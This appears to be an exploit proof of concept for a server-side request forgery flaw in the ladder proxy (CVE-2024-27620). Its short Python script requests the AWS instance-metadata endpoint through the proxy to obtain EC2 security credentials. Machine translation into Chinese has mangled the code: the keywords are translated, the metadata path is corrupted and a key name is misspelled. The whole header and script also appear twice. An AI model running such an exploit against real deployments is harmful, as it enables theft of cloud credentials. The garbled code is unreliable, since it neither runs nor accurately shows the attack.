#利用标题:梯子V0.0.21-服务器端请求伪造(SSRF)
#日期: 2024-01-20
#利用作者: @__chebuya
#软件link: https://github.com/everywall/ladder
#版本: V0.0.1 -V0.0.21
#在AWS EC2(AMI-0FD63E471B04E22D0)上测试了: Ubuntu 20.04.6 LTS
#CVE: CVE-2024-27620
#Description3:梯子无法对目标地址应用足够的默认限制,从而使攻击者能够获取请求到通常无法从外部上下文中访问的地址。攻击者可以访问私人地址范围,本地收听服务和云实例元数据API
导入请求
进口JSON
target_url='http://127.0.0.1:8080/api/'
imdsv1_url='http://169.254.169.254/festment/最新/元数据/sidentity-credentials/ec2/security-credentials/ec2-instance'
r=requests.get(target_url + imdsv1_url)
response_json=json.loads(r.text)
打印(response_json ['hody'])
#日期: 2024-01-20
#利用作者: @__chebuya
#软件link: https://github.com/everywall/ladder
#版本: V0.0.1 -V0.0.21
#在AWS EC2(AMI-0FD63E471B04E22D0)上测试了: Ubuntu 20.04.6 LTS
#CVE: CVE-2024-27620
#Description3:梯子无法对目标地址应用足够的默认限制,从而使攻击者能够获取请求到通常无法从外部上下文中访问的地址。攻击者可以访问私人地址范围,本地收听服务和云实例元数据API
导入请求
进口JSON
target_url='http://127.0.0.1:8080/api/'
imdsv1_url='http://169.254.169.254/festment/最新/元数据/sidentity-credentials/ec2/security-credentials/ec2-instance'
r=requests.get(target_url + imdsv1_url)
response_json=json.loads(r.text)
打印(response_json ['hody'])